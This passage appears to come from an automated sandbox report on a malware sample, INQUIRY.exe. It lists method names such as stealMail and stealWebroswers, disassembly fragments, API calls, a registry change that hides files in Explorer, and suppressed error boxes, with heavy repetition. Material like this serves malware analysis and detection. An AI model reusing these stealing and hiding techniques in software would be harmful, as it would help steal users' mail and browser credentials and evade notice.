                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00441B28 push 00441BB5h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C020 push 0040C098h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430030 push 0043005Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C09A push 0040C10Bh; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C09C push 0040C10Bh; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C17A push 0040C1A8h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C17C push 0040C1A8h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430198 push 004301C4h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004101B0 push 00410211h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00410214 push 00410415h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C2A4 push eax; retn 0040h
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004583D8 push 00458404h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00410418 push 0041055Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00426524 push 004265F4h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00410530 push 0041055Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046A5E4 push ecx; mov dword ptr [esp], ecx
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040659E push 004065F1h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004065A0 push 004065F1h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0041C6E4 push ecx; mov dword ptr [esp], edx
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00406770 push 0040679Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00426704 push 00426730h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004667D8 push 00466804h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004627D8 push ecx; mov dword ptr [esp], ecx
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040682C push 00406858h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046A8F4 push 0046A91Ah; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046A958 push 0046A984h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0041A978 push ecx; mov dword ptr [esp], edx
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004269BC push 004269E8h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00428A50 push 00428A7Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00444A7C push 00444AA8h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00428A04 push 00428A45h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00441B28 push 00441BB5h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C020 push 0040C098h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430030 push 0043005Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C09A push 0040C10Bh; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C09C push 0040C10Bh; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C17A push 0040C1A8h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C17C push 0040C1A8h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430198 push 004301C4h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004101B0 push 00410211h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00410214 push 00410415h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C2A4 push eax; retn 0040h
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004583D8 push 00458404h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00410418 push 0041055Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00426524 push 004265F4h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00410530 push 0041055Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046A5E4 push ecx; mov dword ptr [esp], ecx
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040659E push 004065F1h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004065A0 push 004065F1h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0041C6E4 push ecx; mov dword ptr [esp], edx
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00406770 push 0040679Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00426704 push 00426730h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004667D8 push 00466804h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004627D8 push ecx; mov dword ptr [esp], ecx
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040682C push 00406858h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046A8F4 push 0046A91Ah; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046A958 push 0046A984h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0041A978 push ecx; mov dword ptr [esp], edx
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004269BC push 004269E8h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00428A50 push 00428A7Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00444A7C push 00444AA8h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00428A04 push 00428A45h; ret

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Changes the view of files in windows explorer (hidden files and folders)Show sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00455880 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043C658 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00452974 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043CF3C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00427418 IsIconic,GetWindowPlacement,GetWindowRect,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043BDB0 IsIconic,GetCapture,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00455880 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043C658 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00452974 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043CF3C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00427418 IsIconic,GetWindowPlacement,GetWindowRect,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043BDB0 IsIconic,GetCapture,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00455880 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0043C658 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00452974 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0043CF3C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00427418 IsIconic,GetWindowPlacement,GetWindowRect,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0043BDB0 IsIconic,GetCapture,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                    Source: C:\Users\user\Desktop\INQUIRY.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\INQUIRY.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicketJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicketJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
